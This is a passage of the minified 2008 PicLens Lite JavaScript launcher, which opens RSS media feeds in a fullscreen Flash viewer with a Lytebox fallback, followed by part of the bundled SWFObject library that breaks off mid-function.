/* PicLens Lite JavaScript: version 1.0
 * Copyright (c) 2008 Cooliris, Inc.
 * All Rights Reserved.
 * 
 * The JavaScript portion of PicLens Lite is licensed under BSD (http://lite.piclens.com/bsdlicense)
 * This launcher includes and interacts with SWFObject (MIT), BrowserDetect (BSD Compatible), and Lytebox (CC Attribution 3.0).
 * 
 * There are two versions of this JS: 
 * http://lite.piclens.com/current/piclens.js            full file with comments    (~43KB)
 * http://lite.piclens.com/current/piclens_optimized.js  light version for deployment (~29KB)
 */
var PicLensLite={start:function(_1){
this.determineBrowserParameters();
clearTimeout(this.REMOVE_TIMER_ID);
if(_1){
this.ARGS=_1;
}
this.START_ITEM_GUID=null;
if(typeof _1!="undefined"){
if(_1.guid){
this.START_ITEM_GUID=_1.guid;
}
if(_1.feedUrl){
this.THE_FEED_URL=_1.feedUrl;
if(this.checkForPluginAndLaunchIfPossible(_1.feedUrl)){
return;
}
if(_1.loadFeedInFlash){
this.LOAD_FEED_IN_FLASH=true;
this.showFlashUI();
}else{
this.loadViaXHR(_1.feedUrl);
}
}
if(_1.feedData){
this.showFlashUI(_1.feedData);
}
}else{
var _2=this.indexFeeds();
if(_2.length!=0){
var _3=_2[0];
this.loadViaXHR(_3.url);
}
}
},isRunning:function(){
return this.LITE_IS_RUNNING;
},setLiteURLs:function(_4){
if(_4.swf){
this.LITE_URL=_4.swf;
}else{
if(_4.lite){
this.LITE_URL=_4.lite+"PicLensLite.swf";
}
}
if(_4.button){
this.BUTTON_URL=_4.button;
}else{
if(_4.lite){
this.BUTTON_URL=_4.lite+"NoFlash.jpg";
}
}
var _5="";
if(_4.lbox){
_5=_4.lbox;
}else{
if(_4.lite){
_5=_4.lite+"../lytebox/";
}
}
if(_4.lboxcss){
this.LBOX_CSS_URL=_4.lboxcss;
}else{
if(_5!=""){
this.LBOX_CSS_URL=_5+"lytebox.css";
}
}
if(_4.lboxjs){
this.LBOX_JS_URL=_4.lboxjs;
}else{
if(_5!=""){
this.LBOX_JS_URL=_5+"lytebox.js";
}
}
this.URLS_DETERMINED=true;
},ARGS:{},DEBUG_NOCLIENT:false,DEBUG_NOFLASH:false,MARGIN_W:60,MARGIN_H:20,LITE_BG_DIV:null,LITE_FG_DIV:null,URLS_DETERMINED:false,LITE_URL:null,BUTTON_URL:null,LBOX_CSS_URL:null,LBOX_JS_URL:null,LBOX_COUNT:0,OS_WIN:false,OS_MAC:false,BROWSER_FFX:false,BROWSER_SAF:false,BROWSER_IE:false,BROWSER_IE6:false,THE_FEED:"",THE_FEED_URL:"",LOAD_FEED_IN_FLASH:false,LITE_IS_RUNNING:false,piclensIsRunning_:false,FLASH_ID_1:"pllflash1",FLASH_ID_2:"pllflash2",FLASH_VER:null,FLASH_URL:"http://www.adobe.com/go/getflashplayer",PL_URL:"http://download.piclens.com/partner/",LEARN_PL_URL:"http://affiliate.piclens.com/partner/",START_ITEM_GUID:null,REMOVE_TIMER_ID:0,RESIZE_TIMER_IE6:null,RESIZE_HANDLER_EXISTS:false,FONT:"font-family: Lucida Grande, Myriad Pro, Verdana, Helvetica, Arial, sans-serif;",addKeyHandlers:function(){
var _6=this;
document.onkeydown=function(e){
var _8;
if(e==null){
_8=window.event.keyCode;
}else{
_8=e.which;
}
_6.handleKeyPress(_8);
return false;
};
},addMouseHandlers:function(){
if(window.addEventListener){
window.addEventListener("DOMMouseScroll",this.handleMouseWheel,false);
}
if(document.attachEvent){
document.attachEvent("onmousewheel",this.handleMouseWheel);
}
window.onmousewheel=document.onmousewheel=this.handleMouseWheel;
},appendElementsToDocument:function(){
document.body.appendChild(this.LITE_BG_DIV);
document.body.appendChild(this.LITE_FG_DIV);
},autoResize:function(){
if(!this.isRunning()){
clearInterval(this.RESIZE_TIMER_IE6);
return;
}
var _9=this.getPageSize();
if(this.LITE_BG_DIV){
this.LITE_BG_DIV.style.height=_9.h+"px";
this.LITE_BG_DIV.style.width=_9.w+"px";
}
if(this.LITE_FG_DIV){
var w=(_9.w-this.MARGIN_W*2);
var h=(_9.h-this.MARGIN_H*2);
var fg=this.LITE_FG_DIV;
fg.style.left=fg.style.right=this.MARGIN_W+"px";
fg.style.top=fg.style.bottom=this.MARGIN_H+"px";
fg.style.width=w+"px";
fg.style.height=h+"px";
var _d=this.getFlash();
if(_d){
_d.width=w;
_d.height=h;
}
}
},checkForPluginAndLaunchIfPossible:function(_e){
if(this.hasPicLensClient()){
window.piclens.launch(_e,"","");
return true;
}
return false;
},createBackgroundOverlay:function(){
var bg=document.createElement("div");
this.LITE_BG_DIV=bg;
var _10=this;
bg.id="lite_bg_div";
bg.style.position="fixed";
var _11=bg.style;
_11.width="100%";
_11.height="100%";
if(this.BROWSER_IE6){
_11.position="absolute";
var _12=this.getPageSize();
_11.height=_12.h+"px";
_11.width=_12.w+"px";
}
_11.left="0px";
_11.right="0px";
_11.top="0px";
_11.bottom="0px";
_11.backgroundColor="#000";
_11.opacity="0.5";
_11.filter="alpha(opacity=50)";
if(this.BROWSER_FFX&&this.OS_MAC){
_11.opacity="1";
}
_11.zIndex=1000;
bg.onclick=function(){
_10.exitPicLensLite();
};
},createForegroundFlashComponent:function(){
var fg=document.createElement("div");
this.LITE_FG_DIV=fg;
fg.id="lite_fg_div";
var _14=fg.style;
_14.backgroundColor="#000";
_14.position="fixed";
_14.left=_14.right=this.MARGIN_W+"px";
_14.top=_14.bottom=this.MARGIN_H+"px";
_14.border="2px solid #555";
_14.zIndex=1001;
if(this.BROWSER_IE6){
_14.position="absolute";
var _15=this.getPageSize();
_14.width=(_15.w-this.MARGIN_W*2)+"px";
_14.height=(_15.h-this.MARGIN_H*2)+"px";
}
},closeFlashUI:function(){
var doc=document;
doc.onkeydown="";
window.onmousewheel=doc.onmousewheel="";
if(window.removeEventListener){
window.removeEventListener("DOMMouseScroll",this.handleMouseWheel,false);
}
if(doc.detachEvent){
doc.detachEvent("onmousewheel",this.handleMouseWheel);
}
this.LITE_BG_DIV.style.display="none";
this.LITE_FG_DIV.style.display="none";
this.REMOVE_TIMER_ID=setTimeout("PicLensLite.removeChildren()",150);
},determineBrowserParameters:function(){
this.OS_MAC=(BrowserDetect.OS=="Mac");
this.OS_WIN=(BrowserDetect.OS=="Windows");
this.BROWSER_FFX=(BrowserDetect.browser=="Firefox");
this.BROWSER_SAF=(BrowserDetect.browser=="Safari");
this.BROWSER_IE=(BrowserDetect.browser=="Explorer");
this.BROWSER_IE6=(this.BROWSER_IE&&BrowserDetect.version=="6");
this.FLASH_VER=swfobject.getFlashPlayerVersion();
},exitPicLensLite:function(){
this.setRunningFlag(false);
var fl=this.getFlash();
if(fl!=null&&fl.fl_exitPicLensLite){
fl.fl_exitPicLensLite();
}else{
this.closeFlashUI();
}
},findScriptLocation:function(){
if(this.URLS_DETERMINED){
return;
}
var _18=document.getElementsByTagName("script");
for(var i=0;i!=_18.length;++i){
var _1a=_18[i];
var _1b=_1a.getAttribute("type");
if(_1b=="text/javascript"){
var _1c=_1a.getAttribute("src");
if(_1c==null){
continue;
}
var _1d=_1c.indexOf("piclens.js");
if(_1d!=-1){
this.setLiteURLs({lite:_1c.substring(0,_1d)});
return;
}else{
_1d=_1c.indexOf("piclens_optimized.js");
if(_1d!=-1){
this.setLiteURLs({lite:_1c.substring(0,_1d)});
return;
}
}
}
}
},getCurrentURL:function(){
return location.href;
},getFeedURL:function(){
return encodeURIComponent(this.THE_FEED_URL);
},getPageSize:function(){
var _1e,_1f,_20,_21;
var doc=document;
var _23=doc.body;
if(window.innerHeight&&window.scrollMaxY){
_1e=doc.scrollWidth;
_1f=(this.isFrame?parent.innerHeight:self.innerHeight)+(this.isFrame?parent.scrollMaxY:self.scrollMaxY);
}else{
if(_23.scrollHeight>_23.offsetHeight){
_1e=_23.scrollWidth;
_1f=_23.scrollHeight;
}else{
var _24=doc.getElementsByTagName("html").item(0);
_1e=_24.offsetWidth;
_1f=_24.offsetHeight;
_1e=(_1e<_23.offsetWidth)?_23.offsetWidth:_1e;
_1f=(_1f<_23.offsetHeight)?_23.offsetHeight:_1f;
}
}
var _25=doc.documentElement;
if(self.innerHeight){
_20=(this.isFrame)?parent.innerWidth:self.innerWidth;
_21=(this.isFrame)?parent.innerHeight:self.innerHeight;
}else{
if(_25&&_25.clientHeight){
_20=_25.clientWidth;
_21=_25.clientHeight;
}else{
if(_23){
var _24=doc.getElementsByTagName("html").item(0);
_20=_24.clientWidth;
_21=_24.clientHeight;
_20=(_20==0)?_23.clientWidth:_20;
_21=(_21==0)?_23.clientHeight:_21;
}
}
}
var _26=(_1f<_21)?_21:_1f;
var _27=(_1e<_20)?_20:_1e;
return {pw:_27,ph:_26,w:_20,h:_21};
},getElementsFromXMLFeed:function(){
var _28;
if(window.ActiveXObject){
_28=new ActiveXObject("Microsoft.XMLDOM");
_28.async=false;
_28.loadXML(PicLensLite.THE_FEED);
}else{
var _29=new DOMParser();
_28=_29.parseFromString(PicLensLite.THE_FEED,"text/xml");
}
var _2a=_28.getElementsByTagName("*");
return _2a;
},getBasicSlideShowHTML:function(){
var _2b=document.getElementsByTagName("head").item(0);
var _2c=document.createElement("script");
_2c.src=this.LBOX_JS_URL;
_2c.type="text/javascript";
_2b.appendChild(_2c);
var _2d=document.createElement("link");
_2d.rel="stylesheet";
_2d.href=this.LBOX_CSS_URL;
_2d.type="text/css";
_2d.media="screen";
_2b.appendChild(_2d);
var _2e=this.getElementsFromXMLFeed();
var _2f=true;
var _30;
var i;
var _32="";
for(i=0;i<_2e.length;i++){
if(_2e[i].nodeName=="media:content"){
var _33=_2e[i].getAttribute("url");
if(_33.indexOf(".flv")==-1){
var _34=_2e[i].getAttribute("url");
if(_2f){
_30=_34;
_2f=false;
}else{
_32+="<a href=\""+_2e[i].getAttribute("url")+"\" rel=\"lytebox[lite]\"></a> ";
}
}
}
}
var _35="<div id='lightbox_images' align='center' style='display: none; padding-top:10px; color:#FFFFFF; font-size:.8em; "+this.FONT+" color:#999999;'>";
_35+="( Alternatively, <a href=\""+_30+"\" rel=\"lytebox[lite]\" style=\"color:#656588\">click here</a> for a basic slideshow. )";
_35+=_32;
_35+="</div><br/>";
return _35;
},generateAlternativeContent:function(){
var _36="<div id=\"altContent\" style=\"text-align:center; margin: 0 0 0 0; padding: 0 0 0 0; background-color: #252525; min-width:860px;\">";
_36+="<div align=\"center\" style=\"width: 100%; padding-top:60px; "+this.FONT+"\">";
var v=this.FLASH_VER;
var _38;
if(v.major>0){
_38="update your Flash Player from version "+v.major+"."+v.minor+"."+v.release+" to version 9.0.28 or newer";
}else{
_38="install the most recent Flash Player";
}
var _39="";
if(this.THE_FEED){
_39=this.getBasicSlideShowHTML();
}
var _3a=this.PL_URL;
var _3b=this.LEARN_PL_URL;
var pid=this.ARGS.pid;
if(pid){
_3a+=pid+"/";
_3b+=pid+"/";
}
_36+="<div style='padding:10px;'>"+"<span style='padding-left:25px; color:#C6C6C6; font-size:1.5em; font-weight: bold; "+this.FONT+"'>You're just a few clicks away from going full screen!</span><br/>"+"<span style='padding-left:25px; padding-bottom: 15px; color:#C6C6C6; font-size:.9em; "+this.FONT+"'>You must get the PicLens browser plugin, or "+_38+".</span>"+"</div>"+"<img src=\""+this.BUTTON_URL+"\" alt=\"\" border=\"0\" usemap=\"#Map\">"+"<map name=\"Map\" id=\"Map\">"+"<area shape=\"rect\" coords=\"31,34,316,293\" href=\""+_3a+"\" alt=\"\" />"+"<area shape=\"rect\" coords=\"593,209,825,301\" href=\""+this.FLASH_URL+"\" alt=\"\" />"+"<area shape=\"rect\" coords=\"328,136,448,158\" href=\""+_3b+"\" alt=\"\" />"+"</map>";
_36+="</div>";
_36+=_39;
_36+="<div align=\"center\" style=\"color:#666666; font-size:11px; "+this.FONT+"\">&copy; 2008 Cooliris, Inc. All trademarks are property of their respective holders.<br/><br/><br/></div>";
_36+="</div>";
return _36;
},generateFlashVars:function(){
var _3d="";
if(this.START_ITEM_GUID!=null){
_3d+="&startItemGUID="+this.START_ITEM_GUID;
}
if(this.LOAD_FEED_IN_FLASH){
_3d+="&feedURL="+this.getFeedURL();
}
if(this.ARGS.pid){
_3d+="&pid="+this.ARGS.pid;
}
if(this.ARGS.maxScale){
_3d+="&maxScale="+this.ARGS.maxScale;
}
if(_3d!=""){
_3d=_3d.substring(1);
}
return _3d;
},getFlash:function(){
if(this.BROWSER_SAF||this.BROWSER_IE){
return document.getElementById(this.FLASH_ID_1);
}else{
return document.getElementById(this.FLASH_ID_2);
}
},getWindowSize:function(){
var _3e=document.documentElement;
var _3f=document.body;
var w=0,h=0;
if(typeof (window.innerWidth)=="number"){
w=window.innerWidth;
h=window.innerHeight;
}else{
if(_3e&&(_3e.clientWidth||_3e.clientHeight)){
w=_3e.clientWidth;
h=_3e.clientHeight;
}else{
if(_3f&&(_3f.clientWidth||_3f.clientHeight)){
w=_3f.clientWidth;
h=_3f.clientHeight;
}
}
}
return {w:w,h:h};
},getFeedFromJS:function(){
return this.THE_FEED;
},handleKeyPress:function(_42){
if(!this.isRunning()){
return;
}
var fl=this.getFlash();
if(fl!=null&&fl.fl_keyPressed){
fl.fl_keyPressed(_42);
}else{
if(_42==27){
this.closeFlashUI();
}
}
},handleMouseWheel:function(e){
var _45=0;
if(!e){
e=window.event;
}
if(e.wheelDelta){
_45=e.wheelDelta/120;
if(window.opera){
_45=-_45;
}
}else{
if(e.detail){
if(Math.abs(e.detail)<3){
_45=-e.detail;
}else{
_45=-e.detail/3;
}
}
}
if(_45){
PicLensLite.sendMouseScrollToFlash(_45);
}
if(e.preventDefault){
e.preventDefault();
}
e.returnValue=false;
return false;
},hasPicLensClient:function(url){
if(this.DEBUG_NOCLIENT){
return false;
}
var _47=false;
if(window.piclens){
_47=true;
}else{
var _48=null;
if(typeof PicLensContext!="undefined"){
_48=new PicLensContext();
}else{
try{
_48=new ActiveXObject("PicLens.Context");
}
catch(e){
_48=null;
}
}
window.piclens=_48;
if(window.piclens){
_47=true;
}
}
if(_47){
var _49;
try{
_49=window.piclens.version;
}
catch(e){
return false;
}
var _4a=_49.split(".");
if(_4a[0]>1){
return true;
}else{
if(_4a[0]==1){
if(_4a[1]>6){
return true;
}else{
if(_4a[1]==6){
if(_4a[2]>0){
return true;
}else{
if(_4a[2]==0){
if(_4a[3]>=824){
return true;
}
}
}
}
}
}
}
return false;
}else{
return false;
}
},showLyteboxLink:function(){
myLytebox.updateLyteboxItems();
myLytebox.doAnimations=false;
var _4b=document.getElementById("lightbox_images");
if(_4b!=null){
_4b.style.display="block";
}
},startLytebox:function(){
if(typeof myLytebox!="undefined"){
this.showLyteboxLink();
}else{
if(typeof initLytebox!="undefined"){
initLytebox();
this.showLyteboxLink();
}else{
if(this.LBOX_COUNT>=4){
return;
}
setTimeout("PicLensLite.startLytebox()",150);
this.LBOX_COUNT++;
}
}
},injectFlashPlayer:function(){
var fg=this.LITE_FG_DIV;
var _4d="100%";
var _4e="100%";
var _4f="100%";
var _50="100%";
if(this.BROWSER_IE6){
_4f="0";
_50="0";
}
var _51=this.generateFlashVars();
var _52=this.generateAlternativeContent();
if(this.meetsRequirements()){
fg.innerHTML="<object id=\""+this.FLASH_ID_1+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+_4d+"\" height=\""+_4e+"\">"+"<param name=\"movie\" value=\""+this.LITE_URL+"\" />"+"<param name=\"quality\" value=\"high\"/> "+"<param name=\"bgcolor\" value=\"#000000\"/> "+"<param name=\"allowScriptAccess\" value=\"always\"/> "+"<param name=\"FlashVars\" value=\""+_51+"\"/> "+"<param name=\"allowFullScreen\" value=\"true\"/> "+"<param name=\"wmode\" value=\"window\"/> "+"<param name=\"scale\" value=\"noscale\"/> "+"<object type=\"application/x-shockwave-flash\" data=\""+this.LITE_URL+"\" width=\""+_4f+"\" height=\""+_50+"\" "+"quality=\"high\" "+"bgcolor=\"#000000\" id=\""+this.FLASH_ID_2+"\" "+"quality=\"high\" "+"FlashVars=\""+_51+"\" "+"allowFullScreen=\"true\" "+"scale=\"noscale\" "+"wmode=\"window\" "+"allowScriptAccess=\"always\">"+"<div>"+_52+"</div>"+"</object>"+"</object>";
}else{
fg.innerHTML=_52;
fg.style.minWidth="860px";
fg.style.minHeight="550px";
fg.style.backgroundColor="#252525";
}
if(this.BROWSER_SAF){
this.resizeUI();
}
},indexFeeds:function(){
var _53=document.getElementsByTagName("link");
var _54=[];
for(var i=0;i!=_53.length;++i){
var _56=_53[i],_57=_56.getAttribute("type");
if(_57=="application/rss+xml"||_57=="text/xml"){
_54.push({title:_56.getAttribute("title"),url:_56.getAttribute("href")});
}
}
return _54;
},loadViaXHR:function(url){
var _59=this;
var _5a=window.XMLHttpRequest?new XMLHttpRequest():new ActiveXObject("MSXML2.XMLHTTP.3.0");
_5a.open("GET",url,true);
_5a.onreadystatechange=function(){
if(_5a.readyState==4&&(_5a.status==200||_5a.status==0)){
if(_5a.responseText){
_59.showFlashUI(_5a.responseText);
}
}
};
_5a.send("");
},meetsRequirements:function(){
if(this.DEBUG_NOFLASH){
return false;
}
var _5b=(this.FLASH_VER.major==0)&&this.BROWSER_IE;
return swfobject.hasFlashPlayerVersion("9.0.28")||_5b;
},removeChildren:function(){
document.body.removeChild(this.LITE_BG_DIV);
document.body.removeChild(this.LITE_FG_DIV);
},resizeUI:function(){
if(this.LITE_FG_DIV){
var _5c=this.getPageSize();
var w=(_5c.w-this.MARGIN_W*2);
var h=(_5c.h-this.MARGIN_H*2);
var fg=this.LITE_FG_DIV;
fg.style.left=fg.style.right=this.MARGIN_W+"px";
fg.style.top=fg.style.bottom=this.MARGIN_H+"px";
fg.style.width=w+"px";
fg.style.height=h+"px";
var _60=this.getFlash();
if(_60){
_60.style.width=w;
_60.style.height=h;
_60.width=w;
_60.height=h;
}
}
},setRunningFlag:function(_61){
this.LITE_IS_RUNNING=_61;
this.piclensIsRunning_=_61;
},setResizeHandler:function(){
if(!this.RESIZE_HANDLER_EXISTS&&this.BROWSER_SAF){
var _62=this;
window.addEventListener("resize",function(){
_62.resizeUI();
},false);
this.RESIZE_HANDLER_EXISTS=true;
}
},setResizeTimer:function(){
if(this.BROWSER_IE6){
this.RESIZE_TIMER_IE6=setInterval("PicLensLite.autoResize()",1000);
}
},showFlashUI:function(_63){
this.THE_FEED=_63;
this.findScriptLocation();
this.createBackgroundOverlay();
this.createForegroundFlashComponent();
if(this.BROWSER_IE){
this.appendElementsToDocument();
}
this.injectFlashPlayer();
if(!this.BROWSER_IE){
this.appendElementsToDocument();
}
this.addKeyHandlers();
this.addMouseHandlers();
this.setRunningFlag(true);
this.setResizeTimer();
this.setResizeHandler();
this.startLytebox();
},sendMouseScrollToFlash:function(_64){
if(!this.isRunning()){
return;
}
var fl=this.getFlash();
if(fl!=null&&fl.fl_mouseMoved){
fl.fl_mouseMoved(_64);
}
}};
var swfobject=function(){
var _1=[];
var _2=[];
var _3=null;
var _4=null;
var _5=false;
var _6=false;
var ua=function(){
var _8=typeof document.getElementById!="undefined"&&typeof document.getElementsByTagName!="undefined"&&typeof document.createElement!="undefined"&&typeof document.appendChild!="undefined"&&typeof document.replaceChild!="undefined"&&typeof document.removeChild!="undefined"&&typeof document.cloneNode!="undefined";
var _9=[0,0,0];
var d=null;
if(typeof navigator.plugins!="undefined"&&typeof navigator.plugins["Shockwave Flash"]=="object"){
d=navigator.plugins["Shockwave Flash"].description;
if(d){
d=d.replace(/^.*\s+(\S+\s+\S+$)/,"$1");
_9[0]=parseInt(d.replace(/^(.*)\..*$/,"$1"),10);
_9[1]=parseInt(d.replace(/^.*\.(.*)\s.*$/,"$1"),10);
_9[2]=/r/.test(d)?parseInt(d.replace(/^.*r(.*)$/,"$1"),10):0;
}
}else{
if(typeof window.ActiveXObject!="undefined"){
var a=null;
var _c=false;
try{
a=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
}
catch(e){
try{
a=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
_9=[6,0,21];
a.AllowScriptAccess="always";
}
catch(e){
if(_9[0]==6){
_c=true;
}
}
if(!_c){
try{
a=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
}
catch(e){
}
}
}
if(!_c&&typeof a=="object"){
try{
d=a.GetVariable("$version");
if(d){
d=d.split(" ")[1].split(",");
_9=[parseInt(d[0],10),parseInt(d[1],10),parseInt(d[2],10)];
}
}
catch(e){
}
}
}
}
var u=navigator.userAgent.toLowerCase();
var p=navigator.platform.toLowerCase();
var _f=/webkit/.test(u);
var _10=_f?parseFloat(u.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):0;
var ie=false;
var win=p?/win/.test(p):/win/.test(u);
var mac=p?/mac/.test(p):/mac/.test(u);
return {w3cdom:_8,playerVersion:_9,webkit:_f,webkitVersion:_10,ie:ie,win:win,mac:mac};
}();
var _14=function(){
if(!ua.w3cdom){
return;
}
addDomLoadEvent(main);
if(ua.ie&&ua.win){
try{
document.write("<script id=__ie_ondomload defer=true src=//:></script>");
var s=document.getElementById("__ie_ondomload");
if(s){
s.onreadystatechange=function(){
if(this.readyState=="complete"){
this.parentNode.removeChild(this);
callDomLoadFunctions();
}
};
}
}
catch(e){
}
}
if(ua.webkit&&typeof document.readyState!="undefined"){
_3=setInterval(function(){
if(/loaded|complete/.test(document.readyState)){
callDomLoadFunctions();
}
},10);
}
if(typeof document.addEventListener!="undefined"){
document.addEventListener("DOMContentLoaded",callDomLoadFunctions,null);
}
addLoadEvent(callDomLoadFunctions);
}();
function callDomLoadFunctions(){
if(_5){
return;
}
if(ua.ie&&ua.win){
var s=document.createElement("span");
try{
var t=document.getElementsByTagName("body")[0].appendChild(s);
t.parentNode.removeChild(t);
}
catch(e){
return;
}
}
_5=true;
if(_3){
clearInterval(_3);
_3=null;
}
var dl=_1.length;
for(var i=0;i<dl;i++){
_1[i]();
}
}
function addDomLoadEvent(fn){
if(_5){
fn();
}else{
_1[_1.length]=fn;
}
}
function addLoadEvent(fn){
if(typeof window.addEventListener!="undefined"){
window.addEventListener("load",fn,false);
}else{
if(typeof document.addEventListener!="undefined"){
document.addEventListener("load",fn,false);
}else{
if(typeof window.attachEvent!="undefined"){
window.attachEvent("onload",fn);
}else{
if(typeof window.onload=="function"){
var _1c=window.onload;
window.onload=function(){
_1c();
fn();
};
}else{
window.onload=fn;
}
}
}
}
}
function main(){
var rl=_2.length;
for(var i=0;i<rl;i++){
var id=_2[i].id;
if(ua.playerVersion[0]>0){
var obj=document.getElementById(id);
if(obj){
if(hasPlayerVersion(_2[i].swfVersion)){
if(ua.webkit&&ua.webkitVersion<312){
fixParams(obj);
}
}else{
if(_2[i].expressInstall&&!_6&&hasPlayerVersion([6,0,65])&&(ua.win||ua.mac)){
showExpressInstall(_2[i]);
}else{
displayAltContent(obj);
}
}
}
}
createCSS("#"+id,"visibility:visible");
}
}
function fixParams(obj){
var _22=obj.getElementsByTagName("object")[0];
if(_22){
var e=document.createElement("embed");
var a=_22.attributes;
if(a){
var al=a.length;
for(var i=0;i<al;i++){
if(a[i].nodeName.toLowerCase()=="data"){
e.setAttribute("src",a[i].nodeValue);
}else{
e.setAttribute(a[i].nodeName,a[i].nodeValue);
}
}
}
var c=_22.childNodes;
if(c){
var cl=c.length;
for(var j=0;j<cl;j++){
if(c[j].nodeType==1&&c[j].nodeName.toLowerCase()=="param"){
e.setAttribute(c[j].getAttribute("name"),c[j].getAttribute("value"));
}
}
}
obj.parentNode.replaceChild(e,obj);
}
}
function fixObjectLeaks(){
if(ua.ie&&ua.win&&hasPlayerVersion([8,0,0])){
window.attachEvent("onunload",function(){
var o=document.getElementsByTagName("object");
if(o){
var ol=o.length;
for(var i=0;i<ol;i++){
o[i].style.display="none";
for(var x in o[i]){
if(typeof o[i][x]=="function"){
o[i][x]=function(){
};
}
}
}
}
});
}
}
function showExpressInstall(_2e){
_6=true;
var obj=document.getElementById(_2e.id);
if(obj){
if(_2e.altContentId){
var ac=document.getElementById(_2e.altContentId);
if(ac){
_4=ac;
}
}else{
_4=abstractAltContent(obj);
}
var w=_2e.width?_2e.width:(obj.getAttribute("width")?obj.getAttribute("width"):0);
if(parseInt(w,10)<310){
w="310";
}
var h=_2e.height?_2e.height:(obj.getAttribute("height")?obj.getAttribute("height"):0);
if(parseInt(h,10)<137){
h="137";
}
var pt=ua.ie&&ua.win?"ActiveX":"PlugIn";
document.title=document.title.slice(0,47)+" - Flash Player Installation";
var dt=document.title;
var fv="MMredirectURL="+window.location+"&MMplayerType="+pt+"&MMdoctitle="+dt;
var el=obj;
if(ua.ie&&ua.win&&obj.readyState!=4){
el=document.createElement("div");
obj.parentNode.insertBefore(el,obj);
obj.style.display="none";
window.attachEvent("onload",function(){
obj.parentNode.removeChild(obj);
});
}
createSWF({data:_2e.expressInstall,id:"SWFObjectExprInst",width:w,height:h},{flashvars:fv},el);
}
}
function displayAltContent(obj){
if(ua.ie&&ua.win&&obj.readyState!=4){
var el=document.createElement("div");
obj.parentNode.insertBefore(el,obj);
el.parentNode.replaceChild(abstractAltContent(obj),el);
obj.style.display="none";
window.attachEvent("onload",function(){
obj.parentNode.removeChild(obj);
});
}else{
obj.parentNode.replaceChild(abstractAltContent(obj),obj);
}
}
function abstractAltContent(obj){
var ac=document.createElement("div");
if(ua.win&&ua.ie){
ac.innerHTML=obj.innerHTML;
}else{
var _3b=obj.getElementsByTagName("object")[0];
if(_3b){
var c=_3b.childNodes;
if(c){
var cl=c.length;
for(var i=0;i<cl;i++){
if(!(c[i].nodeType==1&&c[i].nodeName.toLowerCase()=="param")&&!(c[i].nodeType==8)){
ac.appendChild(c[i].cloneNode(true));
}
}
}
}
}
return ac;
}
function createSWF(_3f,_40,el){
if(ua.ie&&ua.win){
var att="";
for(var i in _3f){
if(typeof _3f[i]=="string"){
if(i=="data"){
_40.movie=_3f[i];
}else{
if(i.toLowerCase()=="styleclass"){
att+=" class=\""+_3f[i]+"\"";
}else{
if(i!="classid"){
att+=" "+i+"=\""+_3f[i]+"\"";
}
}
}
}
}
var par="";
for(var j in _40){
if(typeof _40[j]=="string"){
par+="<param name=\""+j+"\" value=\""+_40[j]+"\" />";
}
}
el.outerHTML="<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\""+att+">"+par+"</object>";
fixObjectLeaks();
}else{
if(ua.webkit&&ua.webkitVersion<312){
var e=document.createElement("embed");
e.setAttribute("type","application/x-shockwave-flash");
for(var k in _3f){
if(typeof _3f[k]=="string"){
if(k=="data"){
e.setAttribute("src",_3f[k]);
}else{
if(k.toLowerCase()=="styleclass"){
e.setAttribute("class",_3f[k]);
}else{
if(k!="classid"){
e.setAttribute(k,_3f[k]);
}
}
}
}
}
for(var l in _40){
if(typeof _40[l]=="string"){
if(l!="movie"){
e.setAttribute(l,_40[l]);
}
}
}
el.parentNode.replaceChild(e,el);
}else{
var o=document.createElement("object");
o.setAttribute("type","application/x-shockwave-flash");
for(var m in _3f){
if(typeof _3f[m]=="string"){
if(m.toLowerCase()=="styleclass"){
o.setAttribute("class",_3f[m]);
}else{
if(m!="classid"){
o.setAttribute(m,_3f[m]);
}
}
}
}
for(var n in _40){
if(typeof _40[n]=="string"&&n!="movie"){
createObjParam(o,n,_40[n]);
}
}
el.parentNode.replaceChild(o,el);
}
}
}
function createObjParam(el,_4d,_4e){
var p=document.createElement("param");
p.setAttribute("name",_4d);
p.setAttribute("value",_4e);
el.appendChild(p);
}
function hasPlayerVersion(rv){
return (ua.playerVersion[0]>rv[0]||(ua.playerVersion[0]==rv[0]&&ua.playerVersion[1]>rv[1])||(ua.playerVersion[0]==rv[0]&&ua.playerVersion[1]==rv[1]&&ua.playerVersion[2]>=rv[2]))?true:false;
}
function createCSS(sel,_52){
if(ua.ie&&ua.mac){
return;
}
var h=document.getElementsByTagName("head")[0];
var s=document.createElement("style");
s.setAttribute("type","text/css");
s.setAttribute("media","screen");
if(!(ua.ie&&ua.win)&&typeof document.createTextNode!="undefined"){
s.appendChild(document.createTextNode(sel+" {"+_52+"}"));
}
h.appendChild(s);
if(ua.ie&&ua.win&&typeof document.styleSheets!="undefined"&&document.styleSheets.length>0){
var ls=document.styleSheets[document.styleSheets.length-1];
if(typeof ls.addRule=="object"){
ls.addRule(sel,_52);
}
}
}
return {registerObject:function(_56,_57,_58){
if(!ua.w3cdom||!_56||!_57){
return;
}
var _59={};
_59.id=_56;
var v=_57.split(".");
_59.swfVersion=[parseInt(v[0],10),parseInt(v[1],10),parseInt(v[2],10)];
_59.expressInstall=_58?_58:false;
_2[_2.length]=_59;
createCSS("#"+_56,"visibility:hidden");
},getObjectById:function(_5b){
var r=null;
if(ua.w3cdom&&_5){
var o=document.getElementById(_5b);
if(o){
var n=o.getElementsByTagName("object")[0];
if(!n||(n&&typeof o.SetVariable!="undefined")){
r=o;
}else{
if(typeof n.SetVariable!="undefined"){
r=n;
}
}
}
}
return r;
},embedSWF:function(_5f,_60,_61,_62,_63,_64,_65,_66,_67){
if(!ua.w3cdom||!_5f||!_60||!_61||!_62||!_63){
return;
}
if(hasPlayerVersion(_63.split("."))){
createCSS("#"+_60,"visibility:hidden");
var att=(typeof _67=="object")?_67:{};
att.data=_5f;
att.width=_61;
att.height=_62;
var par=(typeof _66=="object")?_66:{};
if(typeof _65=="object"){
for(var i in _65){
if(typeof _65[i]=="string"){
if(typeof par.flashvars!="undefined"){
par.flashvars+="&"+i+"="+_65[i];
}else{
par.flashvars=i+"="+_65[i];
}
}
}
}
addDomLoadEvent(function(){
createSWF(att,par,document.getElementById(_60));
createCSS("#"+_60,"visibility:visible");
});
}else{
if(_64&&!_6&&hasPlayerVersion([6,0,65])&&(ua.win||ua.mac)){
createCSS("#"+_60,"visibility:hidden");
addDomLoadEvent(function(){
var _6b={};
